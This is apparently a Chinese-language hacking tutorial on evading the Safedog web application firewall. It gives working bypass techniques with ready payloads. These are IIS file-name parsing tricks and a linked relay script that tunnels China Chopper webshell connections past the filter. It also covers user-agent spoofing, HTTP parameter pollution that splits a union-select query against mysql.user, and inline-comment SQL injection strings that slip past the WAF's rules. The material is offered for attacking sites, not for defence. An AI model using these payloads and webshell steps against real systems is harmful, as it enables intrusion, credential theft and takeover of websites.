安全狗繞過的幾種姿勢
- 0x00 各種奇葩符號
/;.xxx.asp;.jpg /;00.asp/00.jpg
現在沒什麼用了,畢竟某狗和某盾也不是吃乾飯的,寫出來只是為了紀念一下
- 0x02 中轉
抓菜刀連接webshell的包 然後研究安全狗過濾了哪些關鍵字 中轉替換掉那些過濾的關鍵字
用法:
http://www.xssec.org/xiazai/rdog.txt
1.將這個腳本拿到可執行的.asp目錄
2.訪問 http://xxx/demo.asp?dz="要過的shell地址「
3.把地址輸入菜刀,密碼就是你設置的shell密碼,類型還選一句話後綴
例如:http://xxx/demo.asp?dz=http://xxx/yijuhua.php 密碼
4.這個腳本暫時支持.php .aspx的一句話連接 .asp的不能用
- 0x03 偽裝user-agent
網上工具有很多,你可以隨便找一個用,firfox也是比較強大的,我用的是鐵鷹兄的WAF繞過神器來做試驗的,地址放在下面
首先假設一個代理,ie設置之後,那麼ie的流量就從這個埠過。指定域名,也就是只正對目標站修改user-agent,減少工作量。get改為post好像是過智創waf的吧。
- 0x04 復參數繞過
比如一個請求是這樣的
GET http://xxx/pen/news.php?id=1 union select user,password from mysql.user
可以修改為
GET http://xxx/pen/news.php?id=1&;;;id=union&id=select&id=user,password&id=from%20mysql.user
很多WAF都可以這樣繞,目前安全狗的話可以繞過一丟丟語句
- 0x05 SQL注入繞過
首先來一發demo存在SQL注入漏洞的php
當沒有安全狗的時候可以成功注入:
當安裝安全狗後語句會被攔截
安全狗這塊的匹配正則應該是s+and這類的,所以只要想辦法去掉空格,用普通注釋/*/是不行的,安全狗也防了這塊。但是對內聯注釋/!and*/這種不知道為什麼安全狗沒有攔截。
我用下面的語句居然成功繞過SQL注入過濾:
http://xxx/inj.php?id=1/*!and*/1=2/*!union*//*!select*/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17
推薦閱讀: